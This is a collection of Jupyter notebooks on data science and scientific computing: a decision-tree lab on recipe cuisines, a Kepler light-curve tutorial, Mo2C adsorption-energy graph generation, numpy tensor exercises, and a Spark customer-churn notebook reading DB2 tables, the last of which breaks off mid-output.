From Modeling to Evaluation IntroductionIn this lab, we will continue learning about the data science methodology, and focus on the **Modeling** and **Evaluation** stages.------------ Table of Contents1. [Recap](0)2. [Data Modeling](2)3. [Model Evaluation](4) Recap In Lab **From Understanding to Preparation**, we explored the data and prepared it for modeling. The data was compiled by a researcher named Yong-Yeol Ahn, who scraped tens of thousands of food recipes (cuisines and ingredients) from three different websites, namely: www.allrecipes.comwww.epicurious.comwww.menupan.com For more information on Yong-Yeol Ahn and his research, you can read his paper on [Flavor Network and the Principles of Food Pairing](http://yongyeol.com/papers/ahn-flavornet-2011.pdf). Important note: Please note that you are not expected to know how to program in Python. This lab is meant to illustrate the stages of modeling and evaluation of the data science methodology, so it is totally fine if you do not understand the individual lines of code. We have a full course on programming in Python, Python for Data Science, which is also offered on Coursera. So make sure to complete the Python course if you are interested in learning how to program in Python. Using this notebook:To run any of the following cells of code, you can type **Shift + Enter** to excute the code in a cell. Download the library and dependencies that we will need to run this lab.
###Code
import pandas as pd # import library to read data into dataframe
pd.set_option("display.max_columns", None)
import numpy as np # import numpy library
import re # import library for regular expression
import random # library for random number generation
###Output
_____no_output_____
###Markdown
We already placed the data on an IBM server for your convenience, so let's download it from server and read it into a dataframe called **recipes**.
###Code
recipes = pd.read_csv("https://ibm.box.com/shared/static/5wah9atr5o1akuuavl2z9tkjzdinr1lv.csv")
print("Data read into dataframe!") # takes about 30 seconds
###Output
_____no_output_____
###Markdown
We will repeat the preprocessing steps that we implemented in Lab **From Understanding to Preparation** in order to prepare the data for modeling. For more details on preparing the data, please refer to Lab **From Understanding to Preparation**.
###Code
# fix name of the column displaying the cuisine
column_names = recipes.columns.values
column_names[0] = "cuisine"
recipes.columns = column_names
# convert cuisine names to lower case
recipes["cuisine"] = recipes["cuisine"].str.lower()
# make the cuisine names consistent
recipes.loc[recipes["cuisine"] == "austria", "cuisine"] = "austrian"
recipes.loc[recipes["cuisine"] == "belgium", "cuisine"] = "belgian"
recipes.loc[recipes["cuisine"] == "china", "cuisine"] = "chinese"
recipes.loc[recipes["cuisine"] == "canada", "cuisine"] = "canadian"
recipes.loc[recipes["cuisine"] == "netherlands", "cuisine"] = "dutch"
recipes.loc[recipes["cuisine"] == "france", "cuisine"] = "french"
recipes.loc[recipes["cuisine"] == "germany", "cuisine"] = "german"
recipes.loc[recipes["cuisine"] == "india", "cuisine"] = "indian"
recipes.loc[recipes["cuisine"] == "indonesia", "cuisine"] = "indonesian"
recipes.loc[recipes["cuisine"] == "iran", "cuisine"] = "iranian"
recipes.loc[recipes["cuisine"] == "italy", "cuisine"] = "italian"
recipes.loc[recipes["cuisine"] == "japan", "cuisine"] = "japanese"
recipes.loc[recipes["cuisine"] == "israel", "cuisine"] = "jewish"
recipes.loc[recipes["cuisine"] == "korea", "cuisine"] = "korean"
recipes.loc[recipes["cuisine"] == "lebanon", "cuisine"] = "lebanese"
recipes.loc[recipes["cuisine"] == "malaysia", "cuisine"] = "malaysian"
recipes.loc[recipes["cuisine"] == "mexico", "cuisine"] = "mexican"
recipes.loc[recipes["cuisine"] == "pakistan", "cuisine"] = "pakistani"
recipes.loc[recipes["cuisine"] == "philippines", "cuisine"] = "philippine"
recipes.loc[recipes["cuisine"] == "scandinavia", "cuisine"] = "scandinavian"
recipes.loc[recipes["cuisine"] == "spain", "cuisine"] = "spanish_portuguese"
recipes.loc[recipes["cuisine"] == "portugal", "cuisine"] = "spanish_portuguese"
recipes.loc[recipes["cuisine"] == "switzerland", "cuisine"] = "swiss"
recipes.loc[recipes["cuisine"] == "thailand", "cuisine"] = "thai"
recipes.loc[recipes["cuisine"] == "turkey", "cuisine"] = "turkish"
recipes.loc[recipes["cuisine"] == "vietnam", "cuisine"] = "vietnamese"
recipes.loc[recipes["cuisine"] == "uk-and-ireland", "cuisine"] = "uk-and-irish"
recipes.loc[recipes["cuisine"] == "irish", "cuisine"] = "uk-and-irish"
# remove data for cuisines with < 50 recipes:
recipes_counts = recipes["cuisine"].value_counts()
cuisines_indices = recipes_counts > 50
cuisines_to_keep = list(np.array(recipes_counts.index.values)[np.array(cuisines_indices)])
recipes = recipes.loc[recipes["cuisine"].isin(cuisines_to_keep)]
# convert all Yes's to 1's and the No's to 0's
recipes = recipes.replace(to_replace="Yes", value=1)
recipes = recipes.replace(to_replace="No", value=0)
###Output
_____no_output_____
###Markdown
Data Modeling Download and install more libraries and dependies to build decision trees.
###Code
# import decision trees scikit-learn libraries
%matplotlib inline
from sklearn import tree
from sklearn.metrics import accuracy_score, confusion_matrix
import matplotlib.pyplot as plt
!conda install python-graphviz --yes
import graphviz
from sklearn.tree import export_graphviz
import itertools
###Output
_____no_output_____
###Markdown
Check the data again!
###Code
recipes.head()
###Output
_____no_output_____
###Markdown
[bamboo_tree] Only Asian and Indian CuisinesHere, we are creating a decision tree for the recipes for just some of the Asian (Korean, Japanese, Chinese, Thai) and Indian cuisines. The reason for this is because the decision tree does not run well when the data is biased towards one cuisine, in this case American cuisines. One option is to exclude the American cuisines from our analysis or just build decision trees for different subsets of the data. Let's go with the latter solution. Let's build our decision tree using the data pertaining to the Asian and Indian cuisines and name our decision tree *bamboo_tree*.
###Code
# select subset of cuisines
asian_indian_recipes = recipes[recipes.cuisine.isin(["korean", "japanese", "chinese", "thai", "indian"])]
cuisines = asian_indian_recipes["cuisine"]
ingredients = asian_indian_recipes.iloc[:,1:]
bamboo_tree = tree.DecisionTreeClassifier(max_depth=3)
bamboo_tree.fit(ingredients, cuisines)
print("Decision tree model saved to bamboo_tree!")
###Output
_____no_output_____
###Markdown
Let's plot the decision tree and examine how it looks like.
###Code
export_graphviz(bamboo_tree,
feature_names=list(ingredients.columns.values),
out_file="bamboo_tree.dot",
class_names=np.unique(cuisines),
filled=True,
node_ids=True,
special_characters=True,
impurity=False,
label="all",
leaves_parallel=False)
with open("bamboo_tree.dot") as bamboo_tree_image:
bamboo_tree_graph = bamboo_tree_image.read()
graphviz.Source(bamboo_tree_graph)
###Output
_____no_output_____
###Markdown
The decision tree learned:* If a recipe contains *cumin* and *fish* and **no** *yoghurt*, then it is most likely a **Thai** recipe.* If a recipe contains *cumin* but **no** *fish* and **no** *soy_sauce*, then it is most likely an **Indian** recipe. You can analyze the remaining branches of the tree to come up with similar rules for determining the cuisine of different recipes. Feel free to select another subset of cuisines and build a decision tree of their recipes. You can select some European cuisines and build a decision tree to explore the ingredients that differentiate them. Model Evaluation To evaluate our model of Asian and Indian cuisines, we will split our dataset into a training set and a test set. We will build the decision tree using the training set. Then, we will test the model on the test set and compare the cuisines that the model predicts to the actual cuisines. Let's first create a new dataframe using only the data pertaining to the Asian and the Indian cuisines, and let's call the new dataframe **bamboo**.
###Code
bamboo = recipes[recipes.cuisine.isin(["korean", "japanese", "chinese", "thai", "indian"])]
###Output
_____no_output_____
###Markdown
Let's see how many recipes exist for each cuisine.
###Code
bamboo["cuisine"].value_counts()
###Output
_____no_output_____
###Markdown
Let's remove 30 recipes from each cuisine to use as the test set, and let's name this test set **bamboo_test**.
###Code
# set sample size
sample_n = 30
###Output
_____no_output_____
###Markdown
Create a dataframe containing 30 recipes from each cuisine, selected randomly.
###Code
# take 30 recipes from each cuisine
random.seed(1234) # set random seed
bamboo_test = bamboo.groupby("cuisine", group_keys=False).apply(lambda x: x.sample(sample_n))
bamboo_test_ingredients = bamboo_test.iloc[:,1:] # ingredients
bamboo_test_cuisines = bamboo_test["cuisine"] # corresponding cuisines or labels
###Output
_____no_output_____
###Markdown
Check that there are 30 recipes for each cuisine.
###Code
# check that we have 30 recipes from each cuisine
bamboo_test["cuisine"].value_counts()
###Output
_____no_output_____
###Markdown
Next, let's create the training set by removing the test set from the **bamboo** dataset, and let's call the training set **bamboo_train**.
###Code
bamboo_test_index = bamboo.index.isin(bamboo_test.index)
bamboo_train = bamboo[~bamboo_test_index]
bamboo_train_ingredients = bamboo_train.iloc[:,1:] # ingredients
bamboo_train_cuisines = bamboo_train["cuisine"] # corresponding cuisines or labels
###Output
_____no_output_____
###Markdown
Check that there are 30 _fewer_ recipes now for each cuisine.
###Code
bamboo_train["cuisine"].value_counts()
###Output
_____no_output_____
###Markdown
Let's build the decision tree using the training set, **bamboo_train**, and name the generated tree **bamboo_train_tree** for prediction.
###Code
bamboo_train_tree = tree.DecisionTreeClassifier(max_depth=15)
bamboo_train_tree.fit(bamboo_train_ingredients, bamboo_train_cuisines)
print("Decision tree model saved to bamboo_train_tree!")
###Output
_____no_output_____
###Markdown
Let's plot the decision tree and explore it.
###Code
export_graphviz(bamboo_train_tree,
feature_names=list(bamboo_train_ingredients.columns.values),
out_file="bamboo_train_tree.dot",
class_names=np.unique(bamboo_train_cuisines),
filled=True,
node_ids=True,
special_characters=True,
impurity=False,
label="all",
leaves_parallel=False)
with open("bamboo_train_tree.dot") as bamboo_train_tree_image:
bamboo_train_tree_graph = bamboo_train_tree_image.read()
graphviz.Source(bamboo_train_tree_graph)
###Output
_____no_output_____
###Markdown
Now that we defined our tree to be deeper, more decision nodes are generated. Now let's test our model on the test data.
###Code
bamboo_pred_cuisines = bamboo_train_tree.predict(bamboo_test_ingredients)
###Output
_____no_output_____
###Markdown
To quantify how well the decision tree is able to determine the cuisine of each recipe correctly, we will create a confusion matrix which presents a nice summary on how many recipes from each cuisine are correctly classified. It also sheds some light on what cuisines are being confused with what other cuisines. So let's go ahead and create the confusion matrix for how well the decision tree is able to correctly classify the recipes in **bamboo_test**.
###Code
test_cuisines = np.unique(bamboo_test_cuisines)
bamboo_confusion_matrix = confusion_matrix(bamboo_test_cuisines, bamboo_pred_cuisines, test_cuisines)
title = 'Bamboo Confusion Matrix'
cmap = plt.cm.Blues
plt.figure(figsize=(8, 6))
bamboo_confusion_matrix = (
bamboo_confusion_matrix.astype('float') / bamboo_confusion_matrix.sum(axis=1)[:, np.newaxis]
) * 100
plt.imshow(bamboo_confusion_matrix, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(test_cuisines))
plt.xticks(tick_marks, test_cuisines)
plt.yticks(tick_marks, test_cuisines)
fmt = '.2f'
thresh = bamboo_confusion_matrix.max() / 2.
for i, j in itertools.product(range(bamboo_confusion_matrix.shape[0]), range(bamboo_confusion_matrix.shape[1])):
plt.text(j, i, format(bamboo_confusion_matrix[i, j], fmt),
horizontalalignment="center",
color="white" if bamboo_confusion_matrix[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.show()
###Output
_____no_output_____
###Markdown
After running the above code, you should get a confusion matrix similar to the following: The rows represent the actual cuisines from the dataset and the columns represent the predicted ones. Each row should sum to 100%. According to this confusion matrix, we make the following observations:* Using the first row in the confusion matrix, 60% of the **Chinese** recipes in **bamboo_test** were correctly classified by our decision tree whereas 37% of the **Chinese** recipes were misclassified as **Korean** and 3% were misclassified as **Indian**.* Using the Indian row, 77% of the **Indian** recipes in **bamboo_test** were correctly classified by our decision tree and 3% of the **Indian** recipes were misclassified as **Chinese** and 13% were misclassified as **Korean** and 7% were misclassified as **Thai**. **Please note** that because decision trees are created using random sampling of the datapoints in the training set, then you may not get the same results every time you create the decision tree even using the same training set. The performance should still be comparable though! So don't worry if you get slightly different numbers in your confusion matrix than the ones shown above. Using the reference confusion matrix, how many **Japanese** recipes were correctly classified by our decision tree?
###Code
Your Answer:
###Output
_____no_output_____
###Markdown
Double-click __here__ for the solution.<!-- The correct answer is:36.67%.--> Also using the reference confusion matrix, how many **Korean** recipes were misclassified as **Japanese**?
###Code
Your Answer:
###Output
_____no_output_____
###Markdown
Double-click __here__ for the solution.<!-- The correct answer is:3.33%.--> What cuisine has the least number of recipes correctly classified by the decision tree using the reference confusion matrix?
###Code
Your Answer:
###Output
_____no_output_____ |
Interns/Olivia/What_are_LightCurve_objects?.ipynb | ###Markdown
###Code
!pip install lightkurve
from lightkurve import search_targetpixelfile
# First we open a Target Pixel File from MAST, this one is already cached from our previous tutorial!
tpf = search_targetpixelfile('KIC 6922244', quarter=4).download()
# Then we convert the target pixel file into a light curve using the pipeline-defined aperture mask.
lc = tpf.to_lightcurve(aperture_mask=tpf.pipeline_mask)
lc.mission
lc.quarter
lc.time, lc.flux
lc.estimate_cdpp()
%matplotlib inline
lc.plot();
###Output
_____no_output_____
###Markdown
There are a set of useful functions in LightCurve objects which you can use to work with the data. These include: * flatten(): Remove long term trends using a Savitzky–Golay filter * remove_outliers(): Remove outliers using simple sigma clipping * remove_nans(): Remove infinite or NaN values (these can occur during thruster firings) * fold(): Fold the data at a particular period * bin(): Reduce the time resolution of the array, taking the average value in each bin.
###Code
flat_lc = lc.flatten(window_length=401)
flat_lc.plot();
folded_lc = flat_lc.fold(period=3.5225)
folded_lc.plot();
binned_lc = folded_lc.bin(binsize=10)
binned_lc.plot();
lc.remove_nans().flatten(window_length=401).fold(period=3.5225).bin(binsize=10).plot();
###Output
_____no_output_____ |
notebooks/DescriptorGen-networkxGraph-pristine-Mo2C.ipynb | ###Markdown
Calculate reference energies
###Code
# From DFT
E_H2Og = -.14220313E+02
E_H2g = -6.7709484
# Derived values
E_Hg = E_H2g/2.
# O2 gas correction
deltaG = -4.708
TdeltaS = -0.7024
deltaE_ZPE = 0.48
deltaH = deltaG+TdeltaS-deltaE_ZPE
E_O2g = 2*E_H2Og-2*E_H2g-deltaH
E_Og = E_O2g/2.
print('Corrected O2 gas in eV = ',E_O2g)
# adsorbate compositions
E_gas = {'H2': E_H2g, 'H2O':E_H2Og,'H':E_Hg,'O':E_Og}
# To get clean energies
fname = 'Oads_Mo2C_pristine_MDF.db'
db = ase.db.connect(fname)
indexItermList = []
for row in db.select('fmax<=0.05'): # collect clean energies from converged systems
index=row.data.index
iterm=row.data.iterm
indexIterm = index+'_'+iterm
if indexIterm not in indexItermList:
indexItermList.append(indexIterm)
E_clean = dict.fromkeys(indexItermList)
cleanSurfaceList = []
for row in db.select('fmax<=0.05'): # collect clean energies from converged systems
if row.data.adsorbate=='clean':
idx = row.data.index
iterm = row.data.iterm
idxIterm = idx+'_'+iterm
e = row.energy
E_clean[idxIterm]=e
cleanSurfaceList.append((row.id,idx,iterm,e,'Mo2C_'+idxIterm))
print(E_clean)
print(len(E_clean))
dfCleanSurface = pd.DataFrame(cleanSurfaceList,columns=['databaseRowID','Index','Termination','TotalE','Name'])
###Output
_____no_output_____
###Markdown
Compute binding energies and generate graphs
###Code
import os
import time
start_time = time.time()
X = []
y_bindingE = []
y_totalE = []
rowID = []
surfaceIndex=[]
surfaceTerminations=[]
adsDistinctList = []
adsList = []
adsIsomerList = []
adsConfigurationList = []
adsIndicesList = []
distMaxList = []
distMaxAdsList = []
graphNameList = []
fname = 'Oads_Mo2C_pristine_MDF.db'
db = ase.db.connect(fname)
features = []
iniDir = 'Oads_Mo2C_pristine_ini_graphml'
finDir = 'Oads_Mo2C_pristine_fin_graphml'
os.mkdir(iniDir)
os.mkdir(finDir)
for row in db.select('fmax<=0.05'):
idx = row.data.index
iterm = row.data.iterm
idxIterm = idx+'_'+iterm
BE= row.energy-E_clean[idxIterm]-E_gas[row.data.adsorbate]
finAtoms = db.get_atoms(row.id)
iniAtoms = db.get_atoms(row.id)
iniPos = db.get(row.id).data.initialPositions
adsIndices = db.get(row.id).data.adsorbateIndices
iniAtoms.set_positions(iniPos)
finAds = finAtoms[adsIndices[0]:]
pwdistTup = get_distances(iniAtoms.positions,finAtoms.positions,cell=iniAtoms.get_cell(),pbc=True)
pwdist = np.diagonal(pwdistTup[1])
distMax = np.amax(pwdist)
if len(adsIndices)>1: # Measure distance(s) from O to H(s)
pwdistAds = finAtoms.get_distances(a=adsIndices[0],indices=adsIndices[1:])
distMaxAds = np.amax(pwdistAds)
else:
distMaxAds = 0.
if row.data.adsorbate not in adsDistinctList: adsDistinctList.append(row.data.adsorbate)
graphName = 'Mo2C_'+str(row.data.index)+'_'+str(row.data.iterm)+'_'+row.data.adsorbate+'_'+str(row.data.adsorbateIsomer)+'_'+str(row.data.adsorbateConfiguration)+'_'+str(row.id)
nnNeighborSelfBond = True
G = adsGraphGen(iniAtoms,adsIndices,graphName,row.energy)
Gf = adsGraphGen(finAtoms,adsIndices,graphName,row.energy)
nx.write_graphml(G,iniDir+'/'+graphName+'.graphml')
nx.write_graphml(Gf,finDir+'/'+graphName+'.graphml')
graphNameList.append(graphName)
y_bindingE.append(BE)
y_totalE.append(row.energy)
rowID.append(row.id)
surfaceIndex.append(str(row.data.index))
surfaceTerminations.append(str(row.data.iterm))
adsList.append(row.data.adsorbate)
adsIsomerList.append(str(row.data.adsorbateIsomer))
adsConfigurationList.append(str(row.data.adsorbateConfiguration))
adsIndicesList.append(adsIndices)
distMaxList.append(distMax)
distMaxAdsList.append(distMaxAds)
print("--- %s seconds ---" % (time.time() - start_time))
###Output
_____no_output_____ |
Notebooks/array_matrix_manipulation.ipynb | ###Markdown
Aplication of AI: - Speech recognation - NLP - Image recognation
###Code
# # ML
# Provides computers with the ability to learn without being explicitly programmed
###Output
_____no_output_____
###Markdown
Limitation of mL -
###Code
# Make a vector in numpy
import numpy as np
v = np.array([5, 2, 1])
print(v)
print(v.shape)
v[1]
v.shape
v = np.array([[5, 2, 1]])
# print(v)
print(v.shape)
v_t = np.transpose(v)
print(v_t)
v_t.shape # (3, 1) = (row, column)
v[0]
v[0][1]
# in DS-2.2 our input should 2d array
# Make a matrix
matrix = np.array([[1,2,3], [2, 0, 1]])
print(matrix)
print(matrix.shape)
print(matrix.size) # size is number of elements
matrix_t = np.transpose(matrix)
print(matrix_t)
print(matrix_t.shape)
print(matrix_t.size)
# Arrange or reshape the matrix (2D array or 2D Tensor)
v_2 = np.array([[1,2,3], [2, 0, 1]])
print("just a reshape like transpose: ",v_2.reshape(3, 2))
# By applying the following reshape we transform the amtrix into 3D Tenosor
print("Specified 1st parameter: ",v_2.reshape(3, 1, 2))
print("UNSpecified 1st parameter: ", v_2.reshape(-1, 1, 2))
# Make a 3D Tensor in numpy
v = np.array([[[1., 2.,3.], [4.,5.,6.]], [[7.,8.,9.], [11.,12.,13.]]])
print(v)
# The first element of shape shows how many, and the second and third elements shows the dimension
print(v.shape)
print(v[0])
print(v[1])
# print(v[2]) this gives error because we have only 2 depth
print(v.size) # 12
print(v.reshape(3, 2, -1)) # this equals to v.reshape(3, 2, 2)
print(v.reshape(3, 1, -1))
print(v.reshape(3, -1, 1)) # we want one column and '-1' is '4' here which is the num of rows
# Make a 4D Tensor Matrix
v_4 = np.zeros((2, 3, 5, 5))
print(v_4)
# Make 5D Tensor in numpy
v_5 = np.zeros((2, 2, 3, 5, 5)) # 2 by 2 and depth is 3 and the 5 by 5
print(v_5)
print(v[0][0].shape)
print(v[0][1].shape)
print(v[1][0].shape)
print(v[1][1].shape)
# Matrix Multiplication
a = np.array([[4,2,3], [2,0,1]])
# flip the array
b = np.transpose(a)
# find the dot product of a and b
c = np.dot(a, b)
print(c)
d = np.dot(b, a)
print(d)
# dot product of a and b is not the same is dot product of b and a!!!!
# Element-wise multiplication of matrix
# 1st observation do Element-wise multiplication the matrix should be same deminsion
# 2nd observation it is commututive
a = np.array([[1, 2], [3, 4]])
b = np.array([[5, 6], [7, 8]])
print(np.multiply(a,b))
print(np.multiply(a,b))
print(a*b)
print(b*a)
###Output
[[ 5 12]
[21 32]]
[[ 5 12]
[21 32]]
[[ 5 12]
[21 32]]
[[ 5 12]
[21 32]]
|
src/dsx/CustomerChurnAnalysisDSXICP.ipynb | ###Markdown
Evaluate and predict customer churnThis notebook is an adaptation from the work done by [Sidney Phoon and Eleva Lowery](https://github.com/IBMDataScience/DSX-DemoCenter/tree/master/DSX-Local-Telco-Churn-master) with the following modifications:* Use datasets persisted in DB2 Warehouse running on ICP* Deploy and run the notebook on DSX local running on IBM Cloud Private (ICP)* Run spark Machine learning job on ICP as part of the worker nodes.* Document some actions for a beginner data scientist / developer who wants to understand what's going on.The goal is to demonstrate how to build a predictive model with Spark machine learning API (SparkML) to predict customer churn, and deploy it for scoring in Machine Learning (ML) running on ICP. There is an equivalent notebook to run on Watson Data Platform and Watson Machine Learning. ScopeA lot of industries have the issue of customers moving to competitors when the product differentiation is not that important, or there is some customer support issues. One industry illustrating this problem is the telecom industry with mobile, internet and IP TV product offerings. Note book explanationsThe notebook aims to follow the classical data science modeling steps:load the dataprepare the dataanalyze the data (iterate on those two activities)build a modelvalidate the accuracy of the modeldeploy the modelconsume the model as a serviceThis jupyter notebook uses Apache Spark to run the machine learning jobs to build decision trees using random forest classifier to assess when a customer is at risk to move to competitor. Apache Spark offers a Python module called pyspark to operate on data and use ML constructs. Start by all importsAs a best practices for notebook implementation is to do the import at the top of the notebook. * [Spark SQLContext](https://spark.apache.org/docs/latest/sql-programming-guide.html) a spark module to process structured data* [spark conf]() to access Spark cluster configuration and then be able to execute queries* [pandas](https://pandas.pydata.org) Python super library for data analysis* [brunel](https://github.com/Brunel-Visualization/Brunel/wiki) API and tool to visualize data quickly. * [pixiedust](www.ibm.com/PixieDust) Visualize data inside Jupyter notebooksThe first cell below is to execute some system commands to update the kernel with updated dependant library.
###Code
# Library required for pixiedust - a visualization and dashboarding framework
!pip install --user --upgrade pixiedust
import pyspark
import pandas as pd
import brunel
import numpy as np
from pyspark.sql import SQLContext
from pyspark.conf import SparkConf
from pyspark.sql import SparkSession
from pyspark.sql.types import DoubleType
from pyspark.sql.types import DecimalType
from pyspark.sql.types import IntegerType
from pyspark.sql.types import LongType
from pyspark.ml.feature import OneHotEncoder, StringIndexer, VectorIndexer, IndexToString
from pyspark.ml import Pipeline
from pyspark.ml.feature import VectorAssembler
from pyspark.ml.classification import RandomForestClassifier
from pyspark.ml.evaluation import BinaryClassificationEvaluator
from pixiedust.display import *
###Output
Pixiedust database opened successfully
###Markdown
Load data from DB2DSX ICP can be used to bring in data from multiple sources including but not limited to, files, datastores on cloud as well as on premises. DSX ICP includes features to connect to data sources, bring in the data, refine, and then perform analytics.In this sample we connect to DB2 Data Warehouse deployed on ICP and bring data about customer, call notes and marketing campaign in.
###Code
import dsx_core_utils
dataSet = dsx_core_utils.get_remote_data_set_info('CUSTOMER')
dataSource = dsx_core_utils.get_data_source_info(dataSet['datasource'])
print(dataSource)
dbTableOrQuery = dataSet['schema'] + '.' + dataSet['table']
print(dbTableOrQuery)
sparkSession = SparkSession(sc).builder.getOrCreate()
df_customer_transactions = sparkSession.read.format("jdbc").option("url", dataSource['URL']).option("dbtable",dbTableOrQuery).option("user",'BLUADMIN').option("password","changemeplease").load()
df_customer_transactions.show(5)
df_customer_transactions.printSchema()
dataSet = dsx_core_utils.get_remote_data_set_info('CALLNOTES')
dataSource = dsx_core_utils.get_data_source_info(dataSet['datasource'])
print(dataSource)
dbTableOrQuery = dataSet['schema'] + '.' + dataSet['table']
print(dbTableOrQuery)
sparkSession = SparkSession(sc).builder.getOrCreate()
df_call_notes = sparkSession.read.format("jdbc").option("url", dataSource['URL']).option("dbtable",dbTableOrQuery).option("user",'BLUADMIN').option("password","changemeplease").load()
df_call_notes.show(5)
df_call_notes.printSchema()
dataSet = dsx_core_utils.get_remote_data_set_info('CAMPAIGNRESPONSES_EXPANDED')
dataSource = dsx_core_utils.get_data_source_info(dataSet['datasource'])
print(dataSource)
dbTableOrQuery = dataSet['schema'] + '.' + dataSet['table']
print(dbTableOrQuery)
sparkSession = SparkSession(sc).builder.getOrCreate()
df_campaign_responses = sparkSession.read.format("jdbc").option("url", dataSource['URL']).option("dbtable",dbTableOrQuery).option("user",'BLUADMIN').option("password","changemeplease").load()
df_campaign_responses.show(5)
df_campaign_responses.printSchema()
###Output
{u'description': u'', u'URL': u'jdbc:db2://172.16.40.131:32166/BLUDB', 'driver_class': 'com.ibm.db2.jcc.DB2Driver', u'dsx_artifact_type': u'datasource', u'shared': True, u'type': u'DB2', u'name': u'CUSTOMER'}
BLUADMIN.CAMPAIGNRESPONSES_EXPANDED
+----+------------------+---------------------------+-------------------------------------+
| ID|RESPONDED_CAMPAIGN|OWNS_MULTIPLE_PHONE_NUMBERS|AVERAGE_TEXT_MESSAGES__90_DAY_PERIOD_|
+----+------------------+---------------------------+-------------------------------------+
|3064| Kids Tablet| Y| 1561|
|3077| Kids Tablet| Y| 1225|
|3105| Kids Tablet| Y| 1661|
|3106| Kids Tablet| N| 2498|
|3108| Kids Tablet| N| 1118|
+----+------------------+---------------------------+-------------------------------------+
only showing top 5 rows
root
|-- ID: integer (nullable = true)
|-- RESPONDED_CAMPAIGN: string (nullable = true)
|-- OWNS_MULTIPLE_PHONE_NUMBERS: string (nullable = true)
|-- AVERAGE_TEXT_MESSAGES__90_DAY_PERIOD_: integer (nullable = true)
###Markdown
Data PreparationThe next few steps involve a series of data preparation tasks such as filling the missing values, joining datasets etc. The following cell fills the null values for average SMS count and replaces Nulls with spaces for other fields.
###Code
df_campaign_responses = df_campaign_responses.na.fill({'AVERAGE_TEXT_MESSAGES__90_DAY_PERIOD_':'0'})
df_call_notes = df_call_notes.na.fill({'SENTIMENTS':' '})
df_call_notes = df_call_notes.na.fill({'KEYWORD1':' '})
df_call_notes = df_call_notes.na.fill({'KEYWORD2':' '})
###Output
_____no_output_____
###Markdown
In the following cell we join some of the customer and call note data sources using the ID field. This ID field is the one coming from the CUSTOMER DB2 transactional database.
###Code
data_joined_callnotes_churn = df_call_notes.join(df_customer_transactions,df_call_notes['ID']==df_customer_transactions['ID'],'inner').select(df_call_notes['SENTIMENTS'],df_call_notes['KEYWORD1'],df_call_notes['KEYWORD2'],df_customer_transactions['*'])
data_joined_callnotes_churn_campaign = df_campaign_responses.join(data_joined_callnotes_churn,df_campaign_responses['ID']==data_joined_callnotes_churn['ID'],'inner').select(data_joined_callnotes_churn['*'],df_campaign_responses['RESPONDED_CAMPAIGN'],df_campaign_responses['OWNS_MULTIPLE_PHONE_NUMBERS'],df_campaign_responses['AVERAGE_TEXT_MESSAGES__90_DAY_PERIOD_'])
data_joined_callnotes_churn_campaign.take(5)
###Output
_____no_output_____
###Markdown
The following code block is intended to get a feel for Spark DataFrame APIs. We attempt to fix some of the column titles to promote readability, and also remove a duplicate column (Status and Marital Status are the same). Finally convert the DataFrame to Python Pandas structure for visualization. Since some fields are string types from DB2 tables, let us change some of them to other types
###Code
# Change some column names
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumnRenamed("SENTIMENTS", "SENTIMENT").withColumnRenamed("OWNS_MULTIPLE_PHONE_NUMBERS","OMPN")
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumnRenamed("KEYWORD1", "KEYWORD_COMPONENT").withColumnRenamed("KEYWORD2","KEYWORD_QUERY")
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumnRenamed("AVERAGE_TEXT_MESSAGES__90_DAY_PERIOD_", "SMSCOUNT").withColumnRenamed("CAR_OWNER","CAROWNERSHIP")
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumnRenamed("MARITAL_STATUS", "MARITALSTATUS").withColumnRenamed("EST_INCOME","INCOME")
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.drop('Status')
# Change some of the data types
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("CHILDREN", data_joined_callnotes_churn_campaign["CHILDREN"].cast(IntegerType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("INCOME", data_joined_callnotes_churn_campaign["INCOME"].cast(DecimalType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("AGE", data_joined_callnotes_churn_campaign["AGE"].cast(IntegerType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("LONGDISTANCE", data_joined_callnotes_churn_campaign["LONGDISTANCE"].cast(DecimalType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("INTERNATIONAL", data_joined_callnotes_churn_campaign["INTERNATIONAL"].cast(DecimalType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("LOCAL", data_joined_callnotes_churn_campaign["LOCAL"].cast(DecimalType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("DROPPED", data_joined_callnotes_churn_campaign["DROPPED"].cast(IntegerType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("USAGE", data_joined_callnotes_churn_campaign["USAGE"].cast(DecimalType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("RATEPLAN", data_joined_callnotes_churn_campaign["RATEPLAN"].cast(IntegerType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("SMSCOUNT", data_joined_callnotes_churn_campaign["SMSCOUNT"].cast(IntegerType()))
data_joined_callnotes_churn_campaign.show(10)
data_joined_callnotes_churn_campaign.printSchema()
pandas_df_callnotes_campaign_churn = data_joined_callnotes_churn_campaign.toPandas()
pandas_df_callnotes_campaign_churn.head(12)
###Output
+----------+-----------------+----------------+----+------+--------+------+------------+---+-------------+-------+------------+-------------+-----+-------+---------+-------------+--------------------+-----+--------+-----------+-----+------------------+----+--------+
| SENTIMENT|KEYWORD_COMPONENT| KEYWORD_QUERY| ID|GENDER|CHILDREN|INCOME|CAROWNERSHIP|AGE|MARITALSTATUS|ZIPCODE|LONGDISTANCE|INTERNATIONAL|LOCAL|DROPPED|PAYMETHOD|LOCALBILLTYPE|LONGDISTANCEBILLTYPE|USAGE|RATEPLAN|DEVICEOWNED|CHURN|RESPONDED_CAMPAIGN|OMPN|SMSCOUNT|
+----------+-----------------+----------------+----+------+--------+------+------------+---+-------------+-------+------------+-------------+-----+-------+---------+-------------+--------------------+-----+--------+-----------+-----+------------------+----+--------+
